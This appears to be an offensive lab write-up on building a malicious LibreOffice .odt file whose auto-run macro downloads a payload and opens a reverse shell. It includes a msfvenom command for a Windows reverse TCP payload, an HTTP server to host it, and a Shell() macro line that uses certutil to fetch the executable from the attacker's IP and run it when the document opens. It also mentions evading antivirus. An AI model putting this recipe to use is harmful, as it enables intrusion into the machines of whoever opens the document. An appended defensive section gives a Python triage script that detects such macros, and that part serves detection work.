Exploitation

Getting a shell with an .odt file that has a malicious macro embedded.

Open LibreOffice by typing libreoffice in a terminal.

To create a macro, we will go to Tools > Macros > Organize Macros > Basic.

We will then create a new macro, which we can name whatever we want.

We will type Shell(" ")

Anything between the quotation marks will be executed.

So although there are other ways of doing this, I would rather have my payload have a chance of being executed and not be caught by an AV by using the multi/handler, which automatically encodes the payload.

So we will generate our payload.

msfvenom -p windows/shell/reverse_tcp LHOST=192.168.49.227 LPORT=443 -f exe -o lyethar-shell-reverse.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 354 bytes
Final size of exe file: 73802 bytes
Saved as: lyethar-shell-reverse.exe

And start a Python web server on port 80.

python3 -m http.server 80                                          
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...

Inside the macro, between the quotation marks, we will paste this command, which will download our generated payload and execute it, resulting in a reverse shell.

Shell(“Cmd.exe C net use D Y * && cme.exe C certutil.exe -urlcache -split -f “”http://192.168.49.227:80/lyethar-shell.exe”” C:\Users\Public\lyethar.exe &  C:\Users\Public\lyethar.exe”)

Then we save the macro. Once saved, we attach the macro to an event that will execute it when somebody opens the file.

We will go to Tools > Customize > Events > Open Document > Macro... > Nameofmacro > Standard > Main

Save the file as .odt.

Upload and free money.

Code execution.
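
The document built above leaves two artifacts that a defender can check before the file is ever opened: a Basic module containing a Shell( call, and a document event bound to that macro. The following triage script is an added example, not part of the original write-up; the names triage_odt and build_sample are hypothetical, the sample ODT is constructed inline with a harmless placeholder, and the assumption is that the Open Document binding is stored as a script:event-listener element in content.xml.

```python
import io
import re
import zipfile

SHELL_CALL = re.compile(r"\bShell\s*\(", re.IGNORECASE)  # Basic is case-insensitive
MODULE = re.compile(r"^Basic/.+/(?!script-l[bc]\.xml$)[^/]+\.xml$")  # skip indexes
LISTENER = re.compile(r"<script:event-listener\b[^>]*>")
ATTR = re.compile(r'([\w:-]+)="([^"]*)"')

def triage_odt(data: bytes) -> dict:
    """Report Basic modules, Shell( calls and document-event bindings in an ODT."""
    out = {"macro_modules": [], "shell_calls": [], "event_bindings": []}
    with zipfile.ZipFile(io.BytesIO(data)) as odt:
        names = odt.namelist()
        for name in names:
            if MODULE.match(name):
                out["macro_modules"].append(name)
                if SHELL_CALL.search(odt.read(name).decode("utf-8", "replace")):
                    out["shell_calls"].append(name)
        if "content.xml" in names:
            content = odt.read("content.xml").decode("utf-8", "replace")
            for tag in LISTENER.findall(content):
                attrs = dict(ATTR.findall(tag))
                href = attrs.get("xlink:href", "")
                # Assumption: events bound to document macros use this URI scheme.
                if href.startswith("vnd.sun.star.script:"):
                    out["event_bindings"].append((attrs.get("script:event-name"), href))
    # A Shell( call plus an event binding means code can run when the file is opened.
    out["auto_exec_shell"] = bool(out["shell_calls"] and out["event_bindings"])
    return out

def build_sample(with_macro: bool) -> bytes:
    """Constructed sample ODT; the macro body is a harmless placeholder."""
    listener, buf = "", io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("mimetype", "application/vnd.oasis.opendocument.text")
        if with_macro:
            z.writestr("Basic/Standard/Module1.xml",
                       '<script:module script:name="Module1">Sub Main\n'
                       'Shell(&quot;placeholder.exe&quot;)\nEnd Sub</script:module>')
            listener = ('<script:event-listener script:event-name="dom:load" '
                        'xlink:href="vnd.sun.star.script:Standard.Module1.Main'
                        '?language=Basic&amp;location=document"/>')
        z.writestr("content.xml", "<office:document-content><office:scripts>"
                   f"<office:event-listeners>{listener}</office:event-listeners>"
                   "</office:scripts></office:document-content>")
    return buf.getvalue()

if __name__ == "__main__":
    print(triage_odt(build_sample(True)))
```

A mail gateway or upload handler can quarantine any document where auto_exec_shell is true; on endpoints, setting LibreOffice macro security to High or Very High keeps unsigned document macros from running.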
